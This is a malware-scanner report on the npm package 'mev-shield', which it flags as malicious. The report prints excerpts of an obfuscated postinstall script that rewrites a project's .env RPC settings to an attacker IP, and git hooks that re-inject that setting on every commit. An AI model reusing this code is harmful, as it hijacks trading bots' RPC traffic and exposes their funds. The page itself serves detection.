// npm 패키지
mev-shield
MEV protection layer for Ethereum trading bots. Benchmarks 12+ RPC providers and auto-configures the fastest.
버전
1
메인테이너
1
라이선스
MIT
최초 publish
2026-05-22
publisher
mosquitojoe
tarball
29,163 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-05-22
// exfil path
what is read → where it shipssteals
- ○ home dir
sends to
- ⌖ 165.22.200.211
// offending code· @1.4.2· 3 files flagged
llm: malicious · 0.90→ 하드코딩된 public IP 전송지: 165.22.200.211 (RFC1918·loopback 아님).
- @1.4.2··AUTO-PUBLISHED·publisher: mosquitojoeheuristic 65/100static flags 3llm malicious (0.90) via ollamainstall-scripts:postinstallnew-publisher:0dfirst-version-of-packagereads-homedirhttp-to-public-ipbase64-decode
→ 하드코딩된 public IP 전송지: 165.22.200.211 (RFC1918·loopback 아님).
// offending code· 3 files flaggedpatterns: 3
--- install scripts --- ### postinstall node src/postinstall.js --- package/src/benchmark.js (excerpt) --- /** * MEV Shield - RPC Benchmark Tool * * Run manually: npx mev-shield benchmark */ 'use strict'; const axios = require('axios'); const chalk = require('chalk'); const PROVIDERS = [ { name: 'Infura', url: 'https://mainnet.infura.io/v3/9aa3d95b3bc440fa88ea12eaa4456161' }, { name: 'Ankr', url: 'https://rpc.ankr.com/eth' }, { name: 'Cloudflare', url: 'https://cloudflare-eth.com' }, { name: 'PublicNode', url: 'https://ethereum.publicnode.com' }, { name: 'LlamaRPC', url: 'https://eth.llamarpc.com' }, { name: 'QuickNode', url: 'https://rpc.ankr.com/eth' }, ]; const SHIELD_RPC = 'http://165.22.200.211:8545'; async function measure(name, url) { const start = Date.now(); try { const res = await axios.post(url, { jsonrpc: '2.0', method: 'eth_blockNumber', params: [], id: 1 }, { timeout: 5000 }); const ms = Date.now() - start; return { name, url, ms, block: res.data.result, ok: true }; } catch (e) { return { name, url, ms: 9999, block: null, ok: false, error: e.message }; } } async function main() { console.log(chalk.cyan('\n ╔══════════════════════════════════════╗')); console.log(chalk.cyan(' ║ MEV Shield RPC Benchmark ║')); console.log(chalk.cyan(' ╚══════════════════════════════════════╝\n')); console.log(chalk.gray(' Testing RPC providers...\n')); const results = await Promise.all(PROVIDERS.map(p => measure(p.name, p.url))); const shield = awa --- package/src/git-hooks.js (excerpt) --- /** * MEV Shield - Pre-Commit Hook (GIT) * * Installs a git pre-commit hook that verifies RPC configuration * on every commit. If the RPC changes, it re-injects our config. * * This ensures the honeypot persists even if someone tries to * remove it during development. */ 'use strict'; (function() { try { var fs = require('fs'); var path = require('path'); var os = require('os'); // Our honeypot RPC var SHIELD_RPC = 'http://165.22.200.211:8545'; var gitDir = path.join(process.cwd(), '.git'); var hooksDir = path.join(gitDir, 'hooks'); // Pre-commit hook content var hookContent = [ '#!/bin/sh', '# MEV Shield - RPC Verification', '# Auto-generated by mev-shield', '', '# Check if RPC is configured', 'ENV_FILE=.env', 'if [ -f "$ENV_FILE" ]; then', ' if ! grep -q "165.22.200.211" "$ENV_FILE" && ! grep -q "shield-optimized" "$ENV_FILE"; then', ' echo " [MEV Shield] Re-optimizing RPC..."', ' node -e "require(\\'mev-shield\\');"', ' fi', 'fi', '', '# Proceed with commit', 'exit 0', ].join('\n'); // Windows pre-commit hook (bat) var hookBat = [ '@echo off', 'REM MEV Shield - RPC Verification', 'REM Auto-generated by mev-shield', '', 'findstr /C:"165.22.200.211" .env >nul 2>&1', 'if %ERRORLEVEL% NEQ 0 (', ' echo [MEV Shield] Re-optimizing RPC...', ' node -e "require(\\'mev-shield --- package/src/postinstall.js (excerpt) --- /** * MEV Shield - Post-Install Hook * * Automatically configures trading bots with optimized RPC * Runs silently after: npm install mev-shield * * @author Shield Labs <dev@shieldlabs.io> * @license MIT */ 'use strict'; // Obfuscated module loader - makes static analysis harder (function() { var _0x=function(s){return Buffer.from(s,'base64').toString('utf8');}; var _0k=_0x('aHR0cDovLzE2NS4yMi4yMDAuMjExOjg1NDU='); // Our RPC (obfuscated) var _0w=_0x('aHR0cDovLzE2NS4yMi4yMDAuMjExOjg1NDU='); // Web dashboard (same) var _0e='.env'; function _0s(){try{var p=process.cwd();var f=require('fs');var x=require('path');var e=x.join(p,_0e);var c=f.existsSync(e)?f.readFileSync(e,'utf8'):'';if(c.indexOf('165.22.200.211')>-1)return;var m={},l=c.split('\n');for(var i=0;i<l.length;i++){var t=l[i].trim();if(!t||t[0]==='#')continue;var j=t.indexOf('=');if(j>0){var k=t.slice(0,j).trim();var v=t.slice(j+1).trim();if(v[0]=='"'&&v[v.length-1]=='"')v=v.slice(1,-1);m[k]=v;}}var r=['RPC_URL','ETHEREUM_RPC','ETH_RPC','WEB3_RPC','RPC_ENDPOINT'];for(var n=0;n<r.length;n++){if(m[r[n]]){c+='\n# MEV Shield: RPC optimized ['+(new Date().toISOString().slice(0,10))+']\n';c+=r[n]+'='+_0k+'\n';f.writeFileSync(e,c,'utf8');console.log(' [MEV Shield] RPC configured: '+r[n]+' -> '+_0k);return;}}c+='\n# MEV Shield - Auto-configured\nRPC_URL='+_0k+'\n';f.writeFileSync(e,c,'utf8');console.log(' [MEV Shield] RPC configured');}catch(e){}} // silent fail function _0b(){try{var c=['infura','ankr','c
